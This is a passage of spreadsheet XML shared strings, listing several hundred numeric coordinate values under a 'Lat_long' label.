    <t>-6.31991</t>
  </si>
  <si>
    <t>-6.18057</t>
  </si>
  <si>
    <t>-6.16060</t>
  </si>
  <si>
    <t>-6.10200</t>
  </si>
  <si>
    <t>-6.10028</t>
  </si>
  <si>
    <t>-6.21804</t>
  </si>
  <si>
    <t>-6.08946</t>
  </si>
  <si>
    <t>-6.25027</t>
  </si>
  <si>
    <t>-6.28233</t>
  </si>
  <si>
    <t>-6.22510</t>
  </si>
  <si>
    <t>-6.08930</t>
  </si>
  <si>
    <t>-6.18386</t>
  </si>
  <si>
    <t>-6.18396</t>
  </si>
  <si>
    <t>-6.34478</t>
  </si>
  <si>
    <t>1.12906</t>
  </si>
  <si>
    <t>-6.18756</t>
  </si>
  <si>
    <t>-6.28990</t>
  </si>
  <si>
    <t>-6.23707</t>
  </si>
  <si>
    <t>-2.58680</t>
  </si>
  <si>
    <t>-6.18198</t>
  </si>
  <si>
    <t>-6.26937</t>
  </si>
  <si>
    <t>-6.17448</t>
  </si>
  <si>
    <t>-6.26933</t>
  </si>
  <si>
    <t>-7.00029</t>
  </si>
  <si>
    <t>-6.96804</t>
  </si>
  <si>
    <t>-6.96486</t>
  </si>
  <si>
    <t>-6.98866</t>
  </si>
  <si>
    <t>-6.96732</t>
  </si>
  <si>
    <t>-6.98204</t>
  </si>
  <si>
    <t>-6.29836</t>
  </si>
  <si>
    <t>-6.27813</t>
  </si>
  <si>
    <t>-6.95195</t>
  </si>
  <si>
    <t>-6.45060</t>
  </si>
  <si>
    <t>-6.12105</t>
  </si>
  <si>
    <t>-6.28146</t>
  </si>
  <si>
    <t>-7.76537</t>
  </si>
  <si>
    <t>-7.77656</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.44150</t>
  </si>
  <si>
    <t>-2.97864</t>
  </si>
  <si>
    <t>-6.31589</t>
  </si>
  <si>
    <t>-7.23683</t>
  </si>
  <si>
    <t>-8.62126</t>
  </si>
  <si>
    <t>-6.11432</t>
  </si>
  <si>
    <t>2.74947</t>
  </si>
  <si>
    <t>-6.15094</t>
  </si>
  <si>
    <t>-6.24073</t>
  </si>
  <si>
    <t>-6.15090</t>
  </si>
  <si>
    <t>-6.15915</t>
  </si>
  <si>
    <t>-6.31766</t>
  </si>
  <si>
    <t>-6.30225</t>
  </si>
  <si>
    <t>-6.31755</t>
  </si>
  <si>
    <t>-6.31762</t>
  </si>
  <si>
    <t>-7.82651</t>
  </si>
  <si>
    <t>-6.13804</t>
  </si>
  <si>
    <t>-8.00726</t>
  </si>
  <si>
    <t>-7.76437</t>
  </si>
  <si>
    <t>-6.24861</t>
  </si>
  <si>
    <t>-7.53638</t>
  </si>
  <si>
    <t>-6.18021</t>
  </si>
  <si>
    <t>-5.15951</t>
  </si>
  <si>
    <t>-6.25349</t>
  </si>
  <si>
    <t>-5.15478</t>
  </si>
  <si>
    <t>-6.24488</t>
  </si>
  <si>
    <t>-6.24529</t>
  </si>
  <si>
    <t>-5.14785</t>
  </si>
  <si>
    <t>-6.34277</t>
  </si>
  <si>
    <t>15.03192</t>
  </si>
  <si>
    <t>15.06887</t>
  </si>
  <si>
    <t>-6.17546</t>
  </si>
  <si>
    <t>-6.30088</t>
  </si>
  <si>
    <t>-6.57081</t>
  </si>
  <si>
    <t>-6.34305</t>
  </si>
  <si>
    <t>-6.34292</t>
  </si>
  <si>
    <t>-6.32139</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.93844</t>
  </si>
  <si>
    <t>-6.93648</t>
  </si>
  <si>
    <t>-6.16602</t>
  </si>
  <si>
    <t>-6.84403</t>
  </si>
  <si>
    <t>-6.97660</t>
  </si>
  <si>
    <t>-6.14012</t>
  </si>
  <si>
    <t>-7.82518</t>
  </si>
  <si>
    <t>-7.82281</t>
  </si>
  <si>
    <t>-3.51693</t>
  </si>
  <si>
    <t>-7.82132</t>
  </si>
  <si>
    <t>-7.82122</t>
  </si>
  <si>
    <t>-8.45605</t>
  </si>
  <si>
    <t>-8.57548</t>
  </si>
  <si>
    <t>-8.48180</t>
  </si>
  <si>
    <t>-8.57523</t>
  </si>
  <si>
    <t>-6.34284</t>
  </si>
  <si>
    <t>-9.54601</t>
  </si>
  <si>
    <t>-9.66533</t>
  </si>
  <si>
    <t>-7.77131</t>
  </si>
  <si>
    <t>-10.16322</t>
  </si>
  <si>
    <t>-9.00000</t>
  </si>
  <si>
    <t>-8.37235</t>
  </si>
  <si>
    <t>-10.17612</t>
  </si>
  <si>
    <t>-9.48242</t>
  </si>
  <si>
    <t>-10.20107</t>
  </si>
  <si>
    <t>-9.66121</t>
  </si>
  <si>
    <t>-10.20517</t>
  </si>
  <si>
    <t>-10.15837</t>
  </si>
  <si>
    <t>-7.21489</t>
  </si>
  <si>
    <t>-9.79553</t>
  </si>
  <si>
    <t>-9.66294</t>
  </si>
  <si>
    <t>-6.30837</t>
  </si>
  <si>
    <t>-9.70598</t>
  </si>
  <si>
    <t>-9.65218</t>
  </si>
  <si>
    <t>-9.64718</t>
  </si>
  <si>
    <t>-6.34273</t>
  </si>
  <si>
    <t>3.69072</t>
  </si>
  <si>
    <t>-8.37470</t>
  </si>
  <si>
    <t>-8.38509</t>
  </si>
  <si>
    <t>-6.17571</t>
  </si>
  <si>
    <t>-8.50701</t>
  </si>
  <si>
    <t>-7.84218</t>
  </si>
  <si>
    <t>-7.93660</t>
  </si>
  <si>
    <t>-7.85076</t>
  </si>
  <si>
    <t>-7.98901</t>
  </si>
  <si>
    <t>-7.91362</t>
  </si>
  <si>
    <t>-7.61502</t>
  </si>
  <si>
    <t>-7.59727</t>
  </si>
  <si>
    <t>-8.19565</t>
  </si>
  <si>
    <t>-7.74855</t>
  </si>
  <si>
    <t>-7.74846</t>
  </si>
  <si>
    <t>-7.95807</t>
  </si>
  <si>
    <t>-8.15101</t>
  </si>
  <si>
    <t>-4.08345</t>
  </si>
  <si>
    <t>-8.13870</t>
  </si>
  <si>
    <t>-6.11741</t>
  </si>
  <si>
    <t>-6.18091</t>
  </si>
  <si>
    <t>-6.85916</t>
  </si>
  <si>
    <t>-6.22885</t>
  </si>
  <si>
    <t>-6.26889</t>
  </si>
  <si>
    <t>-6.32632</t>
  </si>
  <si>
    <t>-6.15251</t>
  </si>
  <si>
    <t>-6.22064</t>
  </si>
  <si>
    <t>-7.39628</t>
  </si>
  <si>
    <t>3.55026</t>
  </si>
  <si>
    <t>-2.31232</t>
  </si>
  <si>
    <t>-8.56160</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.93925</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.95408</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.95747</t>
  </si>
  <si>
    <t>-7.68280</t>
  </si>
  <si>
    <t>-7.34879</t>
  </si>
  <si>
    <t>-6.14194</t>
  </si>
  <si>
    <t>-6.97058</t>
  </si>
  <si>
    <t>3.31172</t>
  </si>
  <si>
    <t>-6.23819</t>
  </si>
  <si>
    <t>-6.87874</t>
  </si>
  <si>
    <t>-6.28190</t>
  </si>
  <si>
    <t>-6.87412</t>
  </si>
  <si>
    <t>-6.24282</t>
  </si>
  <si>
    <t>-6.38927</t>
  </si>
  <si>
    <t>-7.24564</t>
  </si>
  <si>
    <t>-6.98782</t>
  </si>
  <si>
    <t>-6.24110</t>
  </si>
  <si>
    <t>-6.18502</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.62916</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.62895</t>
  </si>
  <si>
    <t>-6.26625</t>
  </si>
  <si>
    <t>-6.27357</t>
  </si>
  <si>
    <t>-6.32349</t>
  </si>
  <si>
    <t>-6.30549</t>
  </si>
  <si>
    <t>-6.23535</t>
  </si>
  <si>
    <t>-6.15098</t>
  </si>
  <si>
    <t>3.59904</t>
  </si>
  <si>
    <t>-6.54810</t>
  </si>
  <si>
    <t>1.80737</t>
  </si>
  <si>
    <t>-6.10938</t>
  </si>
  <si>
    <t>-6.10940</t>
  </si>
  <si>
    <t>-6.24011</t>
  </si>
  <si>
    <t>-6.22664</t>
  </si>
  <si>
    <t>-6.11821</t>
  </si>
  <si>
    <t>-6.11824</t>
  </si>
  <si>
    <t>-6.10996</t>
  </si>
  <si>
    <t>1.04399</t>
  </si>
  <si>
    <t>-6.17540</t>
  </si>
  <si>
    <t>-6.14541</t>
  </si>
  <si>
    <t>-6.23882</t>
  </si>
  <si>
    <t>-6.21201</t>
  </si>
  <si>
    <t>-7.66489</t>
  </si>
  <si>
    <t>-6.28920</t>
  </si>
  <si>
    <t>-6.18714</t>
  </si>
  <si>
    <t>-6.11952</t>
  </si>
  <si>
    <t>-6.30215</t>
  </si>
  <si>
    <t>-6.13123</t>
  </si>
  <si>
    <t>-6.95995</t>
  </si>
  <si>
    <t>-6.25449</t>
  </si>
  <si>
    <t>-6.26758</t>
  </si>
  <si>
    <t>-6.94368</t>
  </si>
  <si>
    <t>-6.90315</t>
  </si>
  <si>
    <t>-6.18573</t>
  </si>
  <si>
    <t>-6.32736</t>
  </si>
  <si>
    <t>-6.29366</t>
  </si>
  <si>
    <t>-6.26789</t>
  </si>
  <si>
    <t>-6.27204</t>
  </si>
  <si>
    <t>3.50631</t>
  </si>
  <si>
    <t>-6.19708</t>
  </si>
  <si>
    <t>-3.25750</t>
  </si>
  <si>
    <t>-8.20503</t>
  </si>
  <si>
    <t>-6.33530</t>
  </si>
  <si>
    <t>-6.11150</t>
  </si>
  <si>
    <t>3.59735</t>
  </si>
  <si>
    <t>-6.28006</t>
  </si>
  <si>
    <t>-8.04286</t>
  </si>
  <si>
    <t>-6.21207</t>
  </si>
  <si>
    <t>-6.21244</t>
  </si>
  <si>
    <t>-7.59777</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.49710</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.49745</t>
  </si>
  <si>
    <t>-8.21238</t>
  </si>
  <si>
    <t>4.18124</t>
  </si>
  <si>
    <t>-8.21240</t>
  </si>
  <si>
    <t>-5.12518</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.42102</t>
  </si>
  <si>
    <t>-6.23508</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.02131</t>
  </si>
  <si>
    <t>-1.23138</t>
  </si>
  <si>
    <t>-1.62361</t>
  </si>
  <si>
    <t>-6.28645</t>
  </si>
  <si>
    <t>-6.27383</t>
  </si>
  <si>
    <t>-6.14544</t>
  </si>
  <si>
    <t>-3.735155</t>
  </si>
  <si>
    <t>-4.129795</t>
  </si>
  <si>
    <t>-4.323665</t>
  </si>
  <si>
    <t>-6.202948</t>
  </si>
  <si>
    <t>-6.335926</t>
  </si>
  <si>
    <t>8.70805</t>
  </si>
  <si>
    <t>8.55566</t>
  </si>
  <si>
    <t>-6.595400</t>
  </si>
  <si>
    <t>4.79167</t>
  </si>
  <si>
    <t>-6.886241</t>
  </si>
  <si>
    <t>-6.181898</t>
  </si>
  <si>
    <t>-7.658382</t>
  </si>
  <si>
    <t>-6.877852</t>
  </si>
  <si>
    <t>-6.877553</t>
  </si>
  <si>
    <t>-5.75941</t>
  </si>
  <si>
    <t>-6.182265</t>
  </si>
  <si>
    <t>-6.292497</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427429288</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427977337</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427945152</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427311927</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.426787300</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.536591315</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.468312056</t>
  </si>
  <si>
    <t>-6.175392975</t>
  </si>
  <si>
    <t>-1.770126497</t>
  </si>
  <si>
    <t>-2.577610851</t>
  </si>
  <si>
    <t>-5.33701810</t>
  </si>
  <si>
    <t>-1.919414911</t>
  </si>
  <si>
    <t>-1.916756634</t>
  </si>
  <si>
    <t>-6.170972160</t>
  </si>
  <si>
    <t>-2.141697100</t>
  </si>
  <si>
    <t>-6.200635000</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.492018375</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.425759130</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.477185360</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.470258171</t>
  </si>
  <si>
    <t>-1.965930834</t>
  </si>
  <si>
    <t>-1.160680064</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.481184740</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.475036255</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.426914249</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427121599</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427573528</t>
  </si>
  <si>
    <t>-1.912223835</t>
  </si>
  <si>
    <t>-5.179827167</t>
  </si>
  <si>
    <t>-6.176064969</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.549570836</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.521253310</t>
  </si>
  <si>
    <t>-1.896857425</t>
  </si>
  <si>
    <t>-1.499580573</t>
  </si>
  <si>
    <t>-2.684024356</t>
  </si>
  <si>
    <t>-6.149006000</t>
  </si>
  <si>
    <t>-2.673577851</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.427229285</t>
  </si>
  <si>
    <t>-8.803950791</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.539044400</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.462242280</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.528695233</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.426422287</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.450991323</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.553183874</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.508371935</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.450049039</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.559950498</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.539409299</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.536634228</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.426454354</t>
  </si>
  <si>
    <t>-6.134143000</t>
  </si>
  <si>
    <t>-6.170774326</t>
  </si>
  <si>
    <t>-2.668203185</t>
  </si>
  <si>
    <t>-2.667586945</t>
  </si>
  <si>
    <t>-6.408192573</t>
  </si>
  <si>
    <t>-6.111404000</t>
  </si>
  <si>
    <t>-1.865254100</t>
  </si>
  <si>
    <t>-1.875880710</t>
  </si>
  <si>
    <t>-1.880155646</t>
  </si>
  <si>
    <t>-6.237719300</t>
  </si>
  <si>
    <t>-6.359384046</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.491865494</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.613684665</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.541285878</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.605999572</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.575949168</t>
  </si>
  <si>
    <t>-2.600607248</t>
  </si>
  <si>
    <t>-2.601330709</t>
  </si>
  <si>
    <t>-2.600893272</t>
  </si>
  <si>
    <t>-2.599228453</t>
  </si>
  <si>
    <t>-2.600325562</t>
  </si>
  <si>
    <t>5.000157100</t>
  </si>
  <si>
    <t>3.592433318</t>
  </si>
  <si>
    <t>5.534095580</t>
  </si>
  <si>
    <t>-6.312863600</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.910210469</t>
  </si>
  <si>
    <t>-2.8442343</t>
  </si>
  <si>
    <t>-1.4535799</t>
  </si>
  <si>
    <t>-6.9811488</t>
  </si>
  <si>
    <t>-6.8708592</t>
  </si>
  <si>
    <t>-7.5496045</t>
  </si>
  <si>
    <t>7.742196</t>
  </si>
  <si>
    <t>-1.5214383</t>
  </si>
  <si>
    <t>-6.1760223</t>
  </si>
  <si>
    <t>-5.4166703</t>
  </si>
  <si>
    <t>-8.4786226</t>
  </si>
  <si>
    <t>-2.4597739</t>
  </si>
  <si>
    <t>-8.4347302</t>
  </si>
  <si>
    <t>-8.4347306</t>
  </si>
  <si>
    <t>-6.2867190</t>
  </si>
  <si>
    <t>-8.3530194</t>
  </si>
  <si>
    <t>-8.3427833</t>
  </si>
  <si>
    <t>-3.7787905</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.4271940</t>
  </si>
  <si>
    <t>3.5559314</t>
  </si>
  <si>
    <t>48.8566964</t>
  </si>
  <si>
    <t>-8.7280138</t>
  </si>
  <si>
    <t>-8.3304990</t>
  </si>
  <si>
    <t>-8.3587992</t>
  </si>
  <si>
    <t>-8.3479613</t>
  </si>
  <si>
    <t>-8.3513515</t>
  </si>
  <si>
    <t>-8.3347765</t>
  </si>
  <si>
    <t>-8.3303001</t>
  </si>
  <si>
    <t>-8.3553706</t>
  </si>
  <si>
    <t>-8.2509465</t>
  </si>
  <si>
    <t>-8.3321822</t>
  </si>
  <si>
    <t>-8.3582897</t>
  </si>
  <si>
    <t>-8.4597397</t>
  </si>
  <si>
    <t>-8.3460293</t>
  </si>
  <si>
    <t>-8.3692473</t>
  </si>
  <si>
    <t>-8.2525563</t>
  </si>
  <si>
    <t>-8.3862377</t>
  </si>
  <si>
    <t>-8.3862429</t>
  </si>
  <si>
    <t>-8.3501821</t>
  </si>
  <si>
    <t>-8.3495801</t>
  </si>
  <si>
    <t>-8.3312102</t>
  </si>
  <si>
    <t>-8.3468998</t>
  </si>
  <si>
    <t>-8.3333758</t>
  </si>
  <si>
    <t>-8.5660030</t>
  </si>
  <si>
    <t>-6.1803147</t>
  </si>
  <si>
    <t>-8.3435500</t>
  </si>
  <si>
    <t>-6.1753930</t>
  </si>
  <si>
    <t>-3.8048644</t>
  </si>
  <si>
    <t>-8.3347788</t>
  </si>
  <si>
    <t>-8.3345276</t>
  </si>
  <si>
    <t>-8.3625463</t>
  </si>
  <si>
    <t>-8.3975097</t>
  </si>
  <si>
    <t>-8.1921556</t>
  </si>
  <si>
    <t>-6.1749487</t>
  </si>
  <si>
    <t>-6.1785981</t>
  </si>
  <si>
    <t>-8.3499994</t>
  </si>
  <si>
    <t>-8.3498508</t>
  </si>
  <si>
    <t>-8.3525119</t>
  </si>
  <si>
    <t>-8.2346498</t>
  </si>
  <si>
    <t>-8.2196577</t>
  </si>
  <si>
    <t>-6.1814942</t>
  </si>
  <si>
    <t>-8.3458125</t>
  </si>
  <si>
    <t>-6.1786699</t>
  </si>
  <si>
    <t>-8.3352635</t>
  </si>
  <si>
    <t>-8.4045785</t>
  </si>
  <si>
    <t>-8.4023910</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.0541806</t>
  </si>
  <si>
    <t>-6.2125160</t>
  </si>
  <si>
    <t>-7.6949881</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.9020433</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.9079756</t>
  </si>
  <si>
    <t>-6.9668282</t>
  </si>
  <si>
    <t>-6.3075758</t>
  </si>
  <si>
    <t>-6.8031540</t>
  </si>
  <si>
    <t>-6.9904003</t>
  </si>
  <si>
    <t>-6.8593290</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.8825084</t>
  </si>
  <si>
    <t>3.2545300</t>
  </si>
  <si>
    <t>-6.3066022</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.1927001</t>
  </si>
  <si>
    <t>-7.2884382</t>
  </si>
  <si>
    <t>5.55311427</t>
  </si>
  <si>
    <t>3.07328477</t>
  </si>
  <si>
    <t>-6.92312517</t>
  </si>
  <si>
    <t>-6.92857268</t>
  </si>
  <si>
    <t>-6.94846343</t>
  </si>
  <si>
    <t>-6.95496895</t>
  </si>
  <si>
    <t>-6.96162023</t>
  </si>
  <si>
    <t>-7.48750552</t>
  </si>
  <si>
    <t>-7.42517150</t>
  </si>
  <si>
    <t>-7.78260152</t>
  </si>
  <si>
    <t>-7.84725557</t>
  </si>
  <si>
    <t>-6.30973620</t>
  </si>
  <si>
    <t>-6.28701270</t>
  </si>
  <si>
    <t>-6.23108560</t>
  </si>
  <si>
    <t>1.40783566</t>
  </si>
  <si>
    <t>-6.55036640</t>
  </si>
  <si>
    <t>-6.46356424</t>
  </si>
  <si>
    <t>-6.55077309</t>
  </si>
  <si>
    <t>-6.32754800</t>
  </si>
  <si>
    <t>-6.58984637</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.84754714</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.88148931</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.88178968</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.90214339</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.90668828</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.13396685</t>
  </si>
  <si>
    <t>-6.80038212</t>
  </si>
  <si>
    <t>-6.76865649</t>
  </si>
  <si>
    <t>-6.82589210</t>
  </si>
  <si>
    <t>-6.95204525</t>
  </si>
  <si>
    <t>-6.82997488</t>
  </si>
  <si>
    <t>1.67589038</t>
  </si>
  <si>
    <t>-6.35752214</t>
  </si>
  <si>
    <t>-6.38765795</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.62130545</t>
  </si>
  <si>
    <t>1.98079218</t>
  </si>
  <si>
    <t>-2.58537983</t>
  </si>
  <si>
    <t>-2.59394681</t>
  </si>
  <si>
    <t>-2.58558151</t>
  </si>
  <si>
    <t>-2.61875837</t>
  </si>
  <si>
    <t>-2.41943817</t>
  </si>
  <si>
    <t>-2.41913770</t>
  </si>
  <si>
    <t>-6.18360351</t>
  </si>
  <si>
    <t>-6.16507150</t>
  </si>
  <si>
    <t>-6.16832099</t>
  </si>
  <si>
    <t>-6.16610580</t>
  </si>
  <si>
    <t>-6.16607807</t>
  </si>
  <si>
    <t>-6.16796120</t>
  </si>
  <si>
    <t>-6.18636344</t>
  </si>
  <si>
    <t>-6.15228210</t>
  </si>
  <si>
    <t>-6.23812521</t>
  </si>
  <si>
    <t>-6.24683270</t>
  </si>
  <si>
    <t>-6.23924492</t>
  </si>
  <si>
    <t>-6.25781958</t>
  </si>
  <si>
    <t>-6.24805540</t>
  </si>
  <si>
    <t>-6.24609384</t>
  </si>
  <si>
    <t>-6.24562742</t>
  </si>
  <si>
    <t>-6.25569747</t>
  </si>
  <si>
    <t>-6.24701589</t>
  </si>
  <si>
    <t>-6.34244616</t>
  </si>
  <si>
    <t>-6.24674075</t>
  </si>
  <si>
    <t>-6.21722782</t>
  </si>
  <si>
    <t>-6.18571497</t>
  </si>
  <si>
    <t>-6.30403680</t>
  </si>
  <si>
    <t>-6.13044732</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.62105870</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.69021761</t>
  </si>
  <si>
    <t>-6.91701665</t>
  </si>
  <si>
    <t>-1.38004547</t>
  </si>
  <si>
    <t>-7.12368640</t>
  </si>
  <si>
    <t>-8.53030308</t>
  </si>
  <si>
    <t>-7.59630847</t>
  </si>
  <si>
    <t>-8.11017372</t>
  </si>
  <si>
    <t>-7.95283631</t>
  </si>
  <si>
    <t>-2.95867895</t>
  </si>
  <si>
    <t>-8.58766753</t>
  </si>
  <si>
    <t>3.59100747</t>
  </si>
  <si>
    <t>3.59033824</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.79483105</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.81650833</t>
  </si>
  <si>
    <t>-7.40361130</t>
  </si>
  <si>
    <t>1.37858370</t>
  </si>
  <si>
    <t>-2.23436157</t>
  </si>
  <si>
    <t>-3.42820827</t>
  </si>
  <si>
    <t>-2.14061236</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.12154689</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.11687459</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.12113920</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.01832485</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.02585673</t>
  </si>
  <si>
    <t>-7.13826052</t>
  </si>
  <si>
    <t>-7.36509430</t>
  </si>
  <si>
    <t>0.06694792</t>
  </si>
  <si>
    <t>0.06845683</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.19269490</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.19270026</t>
  </si>
  <si>
    <t>0.06980229</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.19270563</t>
  </si>
  <si>
    <t>64.78070</t>
  </si>
  <si>
    <t>63.45422</t>
  </si>
  <si>
    <t>74.56035</t>
  </si>
  <si>
    <t xml:space="preserve"> 0.19324743</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.79221883</t>
  </si>
  <si>
    <t>-7.25349605</t>
  </si>
  <si>
    <t>-6.21721958</t>
  </si>
  <si>
    <t>-6.26333873</t>
  </si>
  <si>
    <t>-6.24289792</t>
  </si>
  <si>
    <t>-6.23966517</t>
  </si>
  <si>
    <t>-6.24966458</t>
  </si>
  <si>
    <t>-6.27573899</t>
  </si>
  <si>
    <t>-6.27094619</t>
  </si>
  <si>
    <t>-6.25924695</t>
  </si>
  <si>
    <t>-7.23599334</t>
  </si>
  <si>
    <t>-7.22795218</t>
  </si>
  <si>
    <t>-7.2492229</t>
  </si>
  <si>
    <t>-2.4927878</t>
  </si>
  <si>
    <t>-2.3296527</t>
  </si>
  <si>
    <t>-6.9615830</t>
  </si>
  <si>
    <t>-7.2862539</t>
  </si>
  <si>
    <t>-7.2429381</t>
  </si>
  <si>
    <t>-7.2450454</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.3244463</t>
  </si>
  <si>
    <t>0.6288796</t>
  </si>
  <si>
    <t>-6.9557358</t>
  </si>
  <si>
    <t>-5.34725</t>
  </si>
  <si>
    <t>-8.1079379</t>
  </si>
  <si>
    <t>-8.1079246</t>
  </si>
  <si>
    <t>5.8837110</t>
  </si>
  <si>
    <t>-8.1078943</t>
  </si>
  <si>
    <t>-8.5607252</t>
  </si>
  <si>
    <t>-2.8658246</t>
  </si>
  <si>
    <t>-8.7147308</t>
  </si>
  <si>
    <t>-5.1641426</t>
  </si>
  <si>
    <t>-5.0165885</t>
  </si>
  <si>
    <t>-4.8333725</t>
  </si>
  <si>
    <t>-5.1380913</t>
  </si>
  <si>
    <t>-5.1411902</t>
  </si>
  <si>
    <t>-5.0068390</t>
  </si>
  <si>
    <t>-4.9245200</t>
  </si>
  <si>
    <t>-5.1259212</t>
  </si>
  <si>
    <t>-8.5112942</t>
  </si>
  <si>
    <t>-5.2045958</t>
  </si>
  <si>
    <t>-5.0116596</t>
  </si>
  <si>
    <t>-2.4816403</t>
  </si>
  <si>
    <t>-1.2564713</t>
  </si>
  <si>
    <t>-4.0074036</t>
  </si>
  <si>
    <t>-7.6562552</t>
  </si>
  <si>
    <t>-8.1753274</t>
  </si>
  <si>
    <t>-5.3671517</t>
  </si>
  <si>
    <t>-6.2190526</t>
  </si>
  <si>
    <t>-6.9332595</t>
  </si>
  <si>
    <t>-6.9333497</t>
  </si>
  <si>
    <t>-5.1702759</t>
  </si>
  <si>
    <t>-8.4999616</t>
  </si>
  <si>
    <t>-5.4153070</t>
  </si>
  <si>
    <t>-5.5455549</t>
  </si>
  <si>
    <t>-7.3571591</t>
  </si>
  <si>
    <t>-3.3979424</t>
  </si>
  <si>
    <t>-3.3905007</t>
  </si>
  <si>
    <t>-3.2956889</t>
  </si>
  <si>
    <t>-3.3462011</t>
  </si>
  <si>
    <t>-3.3809098</t>
  </si>
  <si>
    <t>-3.3631665</t>
  </si>
  <si>
    <t>-8.5486515</t>
  </si>
  <si>
    <t>-3.3225948</t>
  </si>
  <si>
    <t>-3.3991633</t>
  </si>
  <si>
    <t>-3.3924053</t>
  </si>
  <si>
    <t>-3.3761973</t>
  </si>
  <si>
    <t>-3.3778396</t>
  </si>
  <si>
    <t>3.0046872</t>
  </si>
  <si>
    <t>3.1677634</t>
  </si>
  <si>
    <t>-3.3118309</t>
  </si>
  <si>
    <t>-3.3116697</t>
  </si>
  <si>
    <t>-8.7818043</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.4342562</t>
  </si>
  <si>
    <t>-6.1269224</t>
  </si>
  <si>
    <t>-8.3304977</t>
  </si>
  <si>
    <t>2.6480929</t>
  </si>
  <si>
    <t>-3.4094984</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.8066417</t>
  </si>
  <si>
    <t>-3.4150237</t>
  </si>
  <si>
    <t>-6.2203294</t>
  </si>
  <si>
    <t>-6.2198093</t>
  </si>
  <si>
    <t>-6.2552636</t>
  </si>
  <si>
    <t>-6.2245423</t>
  </si>
  <si>
    <t>-6.1783676</t>
  </si>
  <si>
    <t>-6.2380927</t>
  </si>
  <si>
    <t>-6.1170797</t>
  </si>
  <si>
    <t>-6.2635535</t>
  </si>
  <si>
    <t>-6.1776970</t>
  </si>
  <si>
    <t>-6.1779583</t>
  </si>
  <si>
    <t>-8.1169830</t>
  </si>
  <si>
    <t>-3.0050834</t>
  </si>
  <si>
    <t>-6.9960631</t>
  </si>
  <si>
    <t>-6.6343620</t>
  </si>
  <si>
    <t>-2.5679031</t>
  </si>
  <si>
    <t>-6.7357441</t>
  </si>
  <si>
    <t>-6.7631501</t>
  </si>
  <si>
    <t>-7.0374015</t>
  </si>
  <si>
    <t>-5.2779750</t>
  </si>
  <si>
    <t>18.9036881</t>
  </si>
  <si>
    <t>1.2997728</t>
  </si>
  <si>
    <t>1.3437708</t>
  </si>
  <si>
    <t>1.3510431</t>
  </si>
  <si>
    <t>-6.1573981</t>
  </si>
  <si>
    <t>-7.4600767</t>
  </si>
  <si>
    <t>-6.2516120</t>
  </si>
  <si>
    <t>-8.5540953</t>
  </si>
  <si>
    <t>Lat_long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</si>
